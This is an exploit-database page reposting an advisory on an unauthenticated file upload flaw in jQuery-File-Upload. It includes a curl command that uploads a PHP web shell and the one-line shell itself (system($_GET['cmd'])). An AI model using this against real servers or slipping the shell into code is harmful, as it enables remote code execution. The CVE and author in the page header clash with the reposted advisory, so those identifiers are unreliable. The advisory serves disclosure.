Advertisement






jQuery-File-Upload < = v9.22.0 unauthenticated arbitrary file upload vulnerability

CVE Category Price Severity
CVE-2019-14900 CWE-434 $500 High
Author Risk Exploitation Type Date
Laxman Muthiyah High Remote 2018-10-10
CPE
cpe:cpe:/a:blueimp:jquery_file_upload:9.22.0
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.0452 0.712086

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100094

Below is a copy:

jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-none]
Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability:
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files
to the server.  It also doesn't exclude file types.  This allows for remote code execution.

This has been actively exploited in the wild for over a year.

Exploit Code:
$ curl   -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
 
Where shell.php is:
 
<?php $cmd=$_GET['cmd']; system($cmd);?>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.